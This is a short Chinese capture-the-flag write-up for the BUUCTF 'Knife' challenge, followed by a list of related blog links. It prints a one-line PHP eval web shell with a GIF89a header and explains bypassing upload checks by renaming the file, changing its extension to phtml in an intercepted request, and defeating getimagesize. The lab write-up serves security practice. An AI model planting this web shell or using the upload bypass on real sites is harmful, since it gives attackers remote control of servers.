[极客大挑战 2019]Knife——3.20BUUCTF练习day4(2)

[极客大挑战 2019]Knife------3.20BUUCTF练习day4(2)

解题内容

在一个文件中输入以下内容,该文件是phtml文件(HTML嵌套PHP代码,可以绕过很多限制)但在本题中要先改文件名为2.gif然后抓包修改后缀名为phtml,因为只可以上传gif和jpg等

php 复制代码
GIF89a
<script language='php'>@eval($_POST[shell]);</script>



蚁剑连接

看了别人的wp,发现还可以删除前端校验函数,直接传phtml文件也可以


拓展

在上传的文件代码中含有GIF89a,这个是在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验

PHP getimagesize(服务器端验证)

读取文件头信息,不是解析整个图片,所以效率较高

相关推荐
00后程序员张18 分钟前
免Mac上架实战:全平台iOS App上架流程的工具协作经验
websocket·网络协议·tcp/ip·http·网络安全·https·udp
缘友一世43 分钟前
网安系列【4】之OWASP与OWASP Top 10:Web安全入门指南
安全·web安全
unable code5 小时前
攻防世界-Reverse-insanity
网络安全·ctf·reverse
亚里士多没有德7755 小时前
【CTF-Web环境搭建】kali
网络安全
车载测试工程师5 小时前
车载以太网网络测试-29【SOME/IP-SD】-SD状态机
网络·网络协议·tcp/ip·车载系统·php
安全系统学习12 小时前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
还鮟15 小时前
CTF Web PHP弱类型与进制绕过(过滤)
php·ctf
2501_9159214315 小时前
iOS IPA 混淆实测分析:从逆向视角验证加固效果与防护流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_9159184115 小时前
打造可观测的 iOS CICD 流程:调试、追踪与质量保障全记录
websocket·网络协议·tcp/ip·http·网络安全·https·udp
zorro_z15 小时前
PHP语法基础篇(八):超全局变量
php